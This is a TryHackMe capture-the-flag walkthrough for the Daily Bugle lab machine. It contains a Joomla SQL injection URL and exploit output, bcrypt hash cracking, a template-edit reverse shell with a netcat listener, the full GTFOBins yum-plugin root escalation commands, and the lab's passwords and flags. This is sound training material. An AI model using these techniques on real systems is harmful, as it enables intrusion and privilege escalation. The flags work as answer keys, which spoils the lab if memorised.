TryHackMe - Daily Bugle - Writeup
Compromise a Joomla CMS account via SQLi, practise cracking hashes and escalate your privileges by taking advantage of yum.
Nmap Scan
root@ip-10-10-110-161:~# nmap -sCV -A 10.10.157.125
Starting Nmap 7.60 ( https://nmap.org ) at 2021-05-23 07:26 BST
Nmap scan report for ip-10-10-157-125.eu-west-1.compute.internal (10.10.157.125)
Host is up (0.00045s latency).
Not shown: 997 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
| 2048 68:ed:7b:19:7f:ed:14:e6:18:98:6d:c5:88:30:aa:e9 (RSA)
| 256 5c:d6:82:da:b2:19:e3:37:99:fb:96:82:08:70:ee:9d (ECDSA)
|_ 256 d2:a9:75:cf:2f:1e:f5:44:4f:0b:13:c2:0f:d7:37:cc (EdDSA)
80/tcp open http Apache httpd 2.4.6 ((CentOS) PHP/5.6.40)
|_http-generator: Joomla! - Open Source Content Management
| http-robots.txt: 15 disallowed entries
| /joomla/administrator/ /administrator/ /bin/ /cache/
| /cli/ /components/ /includes/ /installation/ /language/
|_/layouts/ /libraries/ /logs/ /modules/ /plugins/ /tmp/
|_http-server-header: Apache/2.4.6 (CentOS) PHP/5.6.40
|_http-title: Home
3306/tcp open mysql MariaDB (unauthorized)
MAC Address: 02:DB:73:73:24:0D (Unknown)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.60%E=4%D=5/23%OT=22%CT=1%CU=35474%PV=Y%DS=1%DC=D%G=Y%M=02DB73%T
OS:M=60A9F5AF%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10D%TI=Z%TS=A)SEQ(
OS:SP=106%GCD=1%ISR=10D%TI=Z%CI=RD%II=I%TS=A)OPS(O1=M2301ST11NW7%O2=M2301ST
OS:11NW7%O3=M2301NNT11NW7%O4=M2301ST11NW7%O5=M2301ST11NW7%O6=M2301ST11)WIN(
OS:W1=68DF%W2=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903
OS:%O=M2301NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(
OS:R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z
OS:%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y
OS:%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RI
OS:PL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 1 hop
TRACEROUTE
HOP RTT ADDRESS
1 0.45 ms ip-10-10-157-125.eu-west-1.compute.internal (10.10.157.125)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 30.20 seconds
Directory Scan
root@ip-10-10-110-161:~# gobuster dir -u http://10.10.157.125 -w /usr/share/wordlists/dirb/common.txt -x php,sh,txt,cgi,html,css,js,py
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.157.125
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: txt,cgi,html,css,js,py,php,sh
[+] Timeout: 10s
===============================================================
2021/05/23 07:43:19 Starting gobuster
===============================================================
/.hta (Status: 403)
/.hta.css (Status: 403)
/.hta.js (Status: 403)
/.hta.py (Status: 403)
/.hta.php (Status: 403)
/.hta.sh (Status: 403)
/.hta.txt (Status: 403)
/.hta.cgi (Status: 403)
/.hta.html (Status: 403)
/.htaccess (Status: 403)
/.htaccess.cgi (Status: 403)
/.htaccess.html (Status: 403)
/.htaccess.css (Status: 403)
/.htaccess.js (Status: 403)
/.htaccess.py (Status: 403)
/.htaccess.php (Status: 403)
/.htaccess.sh (Status: 403)
/.htaccess.txt (Status: 403)
/.htpasswd (Status: 403)
/.htpasswd.html (Status: 403)
/.htpasswd.css (Status: 403)
/.htpasswd.js (Status: 403)
/.htpasswd.py (Status: 403)
/.htpasswd.php (Status: 403)
/.htpasswd.sh (Status: 403)
/.htpasswd.txt (Status: 403)
/.htpasswd.cgi (Status: 403)
/administrator (Status: 301)
/bin (Status: 301)
/cache (Status: 301)
/cgi-bin/ (Status: 403)
/cgi-bin/.html (Status: 403)
/components (Status: 301)
/configuration.php (Status: 200)
/images (Status: 301)
/includes (Status: 301)
/language (Status: 301)
/layouts (Status: 301)
/libraries (Status: 301)
/LICENSE.txt (Status: 200)
/index.php (Status: 200)
/index.php (Status: 200)
/media (Status: 301)
/modules (Status: 301)
/plugins (Status: 301)
/README.txt (Status: 200)
/robots.txt (Status: 200)
/robots.txt (Status: 200)
/templates (Status: 301)
/tmp (Status: 301)
/web.config.txt (Status: 200)
===============================================================
2021/05/23 07:43:24 Finished
===============================================================
Deploy
-
Access the web server, who robbed the bank?
Answer: spiderman
Obtain user and root
- What is the Joomla version?
Navigate to http://10.10.157.125/language/en-GB/en-GB.xml there is version number available.
Answer: 3.7.0
Instead of using SQLMap, why not use a python script!
Joomla version 3.7.0 have SQL Injection CVE-2017-8917 Vulnerable parameter is list[fullordering]
http://10.10.157.125/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml'
As per the instruction we are going to use joomblah.py
root@ip-10-10-110-161:~/Exploit-Joomla# ./joomblah.py http://10.10.157.125
.---. .-'''-. .-'''-.
| | ' _ \ ' _ \ .---.
'---' / /` '. \ / /` '. \ __ __ ___ /| | | .
.---.. | \ ' . | \ ' | |/ `.' `. || | | .'|
| || ' | '| ' | '| .-. .-. '|| | | < |
| |\ \ / / \ \ / / | | | | | ||| __ | | __ | |
| | `. ` ..' / `. ` ..' / | | | | | |||/'__ '. | | .:--.'. | | .'''-.
| | '-...-'` '-...-'` | | | | | ||:/` '. '| |/ | \ | | |/.'''. \
| | | | | | | ||| | || |`" __ | | | / | |
| | |__| |__| |__|||\ / '| | .'.''| | | | | |
__.' ' |/'..' / '---'/ / | |_| | | |
| ' ' `'-'` \ \._,\ '/| '. | '.
|____.' `--' `" '---' '---'
[-] Fetching CSRF token
[-] Testing SQLi
- Found table: fb9j5_users
- Extracting users from fb9j5_users
[$] Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']
- Extracting sessions from fb9j5_session
I have to crack the hash to answer the question I used John to crack the hash
john –wordlist=/usr/share/wordlists/rockyou.txt hash.txt
It will take long time to crack the hash. So, for now take a look at the directory we bruteforced before there is a /administrator (Status: 301) it will return admin login page. Now we got our password.
root@ip-10-10-110-161:~# john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Warning: detected hash type "bcrypt", but the string is also recognized as "bcrypt-opencl"
Use the "--format=bcrypt-opencl" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
spiderman123 (?)
1g 0:00:12:13 DONE (2021-05-23 08:57) 0.001363g/s 63.84p/s 63.84c/s 63.84C/s sweet28..spaceship
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
-
What is Jonah’s cracked password?
Answer: spiderman123
Now login to admin http://10.10.157.125/administrator with username jonah . Now we need to get reverse shell for this we have to check joomla reverse shell as we can’t upload php file using media upload.
I found a blog about Joomla Reverse Shell follow up the blog and navigate to Template Customization edit index.php with reverse shell.
After click Template Preview you’ll get shell on your host machine.
root@ip-10-10-252-101:~# nc -nlvp 1234
Listening on [0.0.0.0] (family 0, port 1234)
Connection from 10.10.2.53 34574 received!
Linux dailybugle 3.10.0-1062.el7.x86_64 #1 SMP Wed Aug 7 18:08:02 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux
09:14:39 up 51 min, 0 users, load average: 0.05, 0.05, 0.05
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=48(apache) gid=48(apache) groups=48(apache)
sh: no job control in this shell
sh-4.2$ whoami
whoami
apache
sh-4.2$
we got shell but we are not jjameson . Go to /var/www/html/configuration.php you’ll get password for mysql try login for jjameson
sh-4.2$ su jjameson
su jjameson
Password: nv5uz9r3ZEDzVjNu
id
uid=1000(jjameson) gid=1000(jjameson) groups=1000(jjameson)
Yes! We got jjameson password. Now spawn shell python -c ‘import pty; pty.spawn(“/bin/sh”)’ get the user flag now.
sh-4.2$ cat user.txt
cat user.txt
27a260fe3cba712cfdedb1c86d80442e
Now it’s the time for root flag. Very first thing I check is sudo -l for checking if the current user have permission in any command as sudo. I saw that there is a package management tool installed which is yum
sh-4.2$ sudo -l
sudo -l
Matching Defaults entries for jjameson on dailybugle:
!visiblepw, always_set_home, match_group_by_gid, always_query_group_plugin,
env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE KDEDIR LS_COLORS",
env_keep+="MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE",
env_keep+="LC_COLLATE LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES",
env_keep+="LC_MONETARY LC_NAME LC_NUMERIC LC_PAPER LC_TELEPHONE",
env_keep+="LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET XAUTHORITY",
secure_path=/sbin\:/bin\:/usr/sbin\:/usr/bin
User jjameson may run the following commands on dailybugle:
(ALL) NOPASSWD: /usr/bin/yum
I visited GTFOBins if yum have any misconfiguration, which I can take advantage, Follow instrucation B of GTFOBins.
sh-4.2$ TF=$(mktemp -d)
TF=$(mktemp -d)
sh-4.2$ cat >$TF/x<<EOF
[main]
plugins=1
pluginpath=$TF
pluginconfpath=$TF
EOFcat >$TF/x<<EOF
> [main]
> plugins=1
> pluginpath=$TF
> pluginconfpath=$TF
>
EOF
sh-4.2$ cat >$TF/y.conf<<EOF
[main]
enabled=1
EOFcat >$TF/y.conf<<EOF
> [main]
> enabled=1
>
EOF
sh-4.2$ cat >$TF/y.py<<EOF
import os
import yum
from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
requires_api_version='2.1'
def init_hook(conduit):
os.execl('/bin/sh','/bin/sh')
EOFcat >$TF/y.py<<EOF
> import os
> import yum
> from yum.plugins import PluginYumExit, TYPE_CORE, TYPE_INTERACTIVE
> requires_api_version='2.1'
> def init_hook(conduit):
> os.execl('/bin/sh','/bin/sh')
>
EOF
sh-4.2$ sudo yum -c $TF/x --enableplugin=y
sudo yum -c $TF/x --enableplugin=y
Loaded plugins: y
No plugin match for: y
sh-4.2# whoami
whoami
root
sh-4.2#
Yay! we got root now type cat /root/root.txt
sh-4.2# cat /root/root.txt
cat /root/root.txt
eec3d53292b1821868266858d7fa6f79
sh-4.2#
Machine Link: Daily Bugle
Thanks for reading
Written on May 23, 2021